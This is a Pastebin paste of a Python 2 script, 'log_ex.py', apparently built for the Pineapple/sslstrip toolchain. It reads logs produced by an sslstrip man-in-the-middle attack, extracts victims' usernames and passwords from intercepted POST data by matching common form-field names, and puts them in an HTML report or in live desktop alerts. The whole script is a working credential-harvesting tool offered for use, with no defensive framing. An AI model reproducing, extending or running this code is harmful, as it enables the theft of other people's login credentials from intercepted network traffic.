Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- import os
- import sys
- import time
- import base64
- import urllib
- class LogParser():
- def __init__(self, filePath='sslstrip.log', secureOnly=False):
- self.logins = []
- self.filePath = filePath
- self.passwords = ['Passwd=', 'passwd=', 'word=', 'md5password_utf=', 'pwd=', 'password]=', 'passwordTextBox=', 'theAccountPW=',
- 'Password_Textbox=', 'pass=']
- self.usernames = ['user=', 'name=', 'mail=', 'login=', 'USERID=', 'emailTextBox=', 'email=', 'inputEmailHandle=',
- 'theAccountName=', 'Email_Textbox=', 'UserName=', 'userid=', 'auth_userId=', 'email]=', 'email=']
- if secureOnly:
- self.postToken = 'SECURE POST'
- else:
- self.postToken = 'POST'
- def executeAll(self):
- if self.checkPath():
- self.loadFile()
- self.findSecurePosts()
- else:
- print ' [!] Input file does not exist, see --help'
- def checkPath(self):
- return os.path.exists(self.filePath) and os.path.isfile(self.filePath)
- def loadFile(self):
- log = open(self.filePath, 'r')
- self.data = log.readlines()
- log.close()
- print ' [*] Loaded %s (%d lines)' % (self.filePath, len(self.data))
- def findSecurePosts(self):
- postsCaptured = 0
- sys.stdout.write(' [*] Posts extracted: ')
- for line in self.data:
- try:
- if line.find(self.postToken) == -1:
- continue
- else:
- self.getDataFromLine(self.data.index(line), line)
- postsCaptured += 1
- except:
- continue
- sys.stdout.write(str(postsCaptured) + '\n')
- def getDataFromLine(self, currentLine, line):
- entry = {}
- entry['url'] = line[line.find('(') + 1:line.find(')')] # Get URL
- entry['time_stamp'] = line[:line.find(',')] # Get date/time
- entry['raw_post'] = urllib.unquote(self.data[currentLine + 1]) # Get line after 'POST'
- entry['username'] = self.decodeString(entry['raw_post'], self.usernames)
- entry['password'] = self.decodeString(entry['raw_post'], self.passwords)
- self.logins.append(entry)
- def decodeString(self, string, tokens):
- for token in tokens: # Parse line for password strings
- if string.find(token) > -1:
- start = string[string.find(token) + len(token):]
- data = start[:start.find('&')]
- return data
- return 'VALUE_NOT_FOUND'
- class HtmlGenerator():
- ''' Generates an html document based on '''
- def __init__(self, logins):
- self.logins = logins
- self.raw = False
- self.base64 = False
- self.allPosts = False
- self.filePath = '/usb/modules/sslstrip/log/'
- def build(self):
- self.openFile()
- self.writeHtmlHeader()
- self.createHtmlTable()
- self.writeHtmlTable()
- self.writeHtmlFooter()
- def openFile(self):
- if os.path.exists(self.filePath):
- reply = raw_input(' [?] Overwrite existing %s file? [y/n]: ' % self.filePath).strip()
- if not reply == 'y' or reply == 'Y':
- print ' [!] User exit, please run again!'
- sys.exit()
- self.htmlFile = open(self.filePath, 'w')
- def writeHtmlHeader(self):
- self.htmlFile.write('<html><head><title>%s</title></head>\n' % self.filePath) # Write header info
- self.htmlFile.write('<body>\n') # Create body
- self.htmlFile.write('<h3>%s</h3><h4>Created using <a href="http://0x539.us/" target="newwin">log_ex.py</a></h4><p>\n' % self.filePath )
- def createHtmlTable(self):
- print ' [*] Building html file (%d possible entries)' % len(self.logins)
- self.htmlFile.write('<table border="1" cellpadding="5"><tr bgcolor="E0E0E0">') # Create table
- self.htmlFile.write('<th>Date/Time\n<th>URL\n<th>Username\n<th>Password\n') # Create categories
- if self.base64:
- self.htmlFile.write('<th>Base64 Password Decode\n')
- if self.raw:
- self.htmlFile.write('<th>Raw POST Data\n') # Create post data category, if enabled
- def writeHtmlTable(self):
- for entry in self.logins:
- if self.allPosts:
- self.writeTableEntry(entry)
- elif entry['username'] != 'VALUE_NOT_FOUND' and entry['password'] != 'VALUE_NOT_FOUND':
- self.writeTableEntry(entry)
- def writeTableEntry(self, entry):
- self.htmlFile.write('<tr>') # Create new line
- self.htmlFile.write('<td bgcolor="#FAF0F5"> %s' % entry['time_stamp']) # Write date / time
- self.htmlFile.write('<td bgcolor="#FAF0F5"> %s' % entry['url']) # Write URL
- self.htmlFile.write('<td bgcolor="#FAF0F5"> %s' % entry['username']) # Write username data
- self.htmlFile.write('<td bgcolor="#FAF0F5"> %s' % entry['password']) # Write password data
- if self.base64:
- try:
- self.htmlFile.write('<td bgcolor="#FAF0F5"> %s' % base64.standard_b64decode(entry['password']))
- except:
- self.htmlFile.write('<td bgcolor="#FAF0F5"> NONE')
- if self.raw: # Write raw post data if enabled
- self.htmlFile.write('<td bgcolor="#FAF0F5"> %s' % entry['raw_post'])
- self.htmlFile.write('\n') # End line
- def writeHtmlFooter(self):
- self.htmlFile.write('</table>\n</body>\n</html>\n') # End output
- self.htmlFile.close() # Close file
- class DaemonDisplay():
- def __init__(self, logParser):
- self.logParser = logParser
- self.refreshRate = 60
- self.displayed = []
- def executeAll(self):
- try:
- while True:
- self.checkLogins()
- time.sleep(self.refreshRate)
- self.logParser.executeAll()
- except KeyboardInterrupt:
- print '\n [*] User Exit'
- except:
- os._exit(1)
- def checkLogins(self):
- for entry in self.logParser.logins:
- if not entry in self.displayed:
- if entry['username'] != 'VALUE_NOT_FOUND' and entry['password'] != 'VALUE_NOT_FOUND':
- self.displayNewLogin(entry['url'], entry['username'], entry['password'])
- self.displayed.append(entry)
- def displayNewLogin(self, url, username, password):
- durl = self.escapeString(url)
- duser = self.escapeString(username)
- dpass = self.escapeString(password)
- os.system('notify-send -t 95000 "Url: %s\nUsername: %s\nPassword: %s"' % (durl, duser, dpass))
- log = open('notify.log', 'a')
- log.write('Url: %s \n Username: %s \n Password: %s\n\n' % (url, username, password))
- log.close()
- def escapeString(self, string):
- string = string.replace('\\', '\\\\')
- string = string.replace('$', '\$')
- return string
- # ============ [ Interface Code ] ============
- authors = 'Moloch'
- version = 'v0.3'
- def banner():
- print '\n -- [buffer]overflow Proudly Presents ---'
- print " ooooo oooooooooooo "
- print " 888' `888' `8 "
- print " 888 .ooooo. .oooooooo 888 oooo ooo "
- print " 888 d88' `88b 888' `88b 888oooo8 `88b..8P' "
- print " 888 888 888 888 888 888 Y888' "
- print " 888 o 888 888 `88bod88P 888 o .o8''88b "
- print " o888ooooood8 `Y8bod8P' `8oooooo o888ooooood8 o88' 888o "
- print " YD "
- print " Y88888P' [%s by %s]\n" % (version, authors)
- def help():
- banner()
- print ' Usage: log_ex.py file [options]'
- print ' Options:'
- print '\t-o, --out......................Specify an output file name'
- print '\t-t, --time.....................Add a time stamp to the output filename'
- print '\t-a, --all......................Include all possible logins'
- print '\t-r, --raw......................Include raw post data in the output'
- print '\t-b, --base64...................Include a base64 decode of passwords'
- print '\t-d, --daemon...................Run as daemon, only displays Username/Password'
- def getArgument(token, arguments):
- index = 0
- try:
- for arg in arguments:
- if token in arg:
- return arguments[index + 1]
- index+=1
- except IndexError:
- print " [!] Error: Malformed command, see --help"
- sys.exit()
- if __name__ == '__main__':
- if len(sys.argv) == 1 or '-h' in sys.argv or '--help' in sys.argv:
- help()
- sys.exit()
- logp = LogParser(sys.argv[1])
- if logp.checkPath():
- logp.executeAll()
- if '-d' in sys.argv or '--daemon' in sys.argv:
- DaemonDisplay(logp).executeAll()
- sys.exit()
- else:
- htmlGen = HtmlGenerator(logp.logins)
- if '-a' in sys.argv or '--all' in sys.argv:
- htmlGen.allPosts = True
- if '-r' in sys.argv or '--raw' in sys.argv:
- htmlGen.raw = True
- if '-b' in sys.argv or '--base64' in sys.argv:
- htmlGen.base64 = True
- if '-o' in sys.argv or '--output' in sys.argv:
- htmlGen.filePath = getArgument('-o', sys.argv)
- if '-t' in sys.argv or '--time' in sys.argv:
- htmlGen.filePath = htmlGen.filePath + '_' + str(time.strftime('%H-%M-%S')) + '.html'
- try:
- htmlGen.build()
- except:
- print ' [!] An error occurred while building', htmlGen.filePath
- else:
- print ' [!] Error: The log file (%s) does not exist, see --help' % sys.argv[1]
Add Comment
Please, Sign In to add comment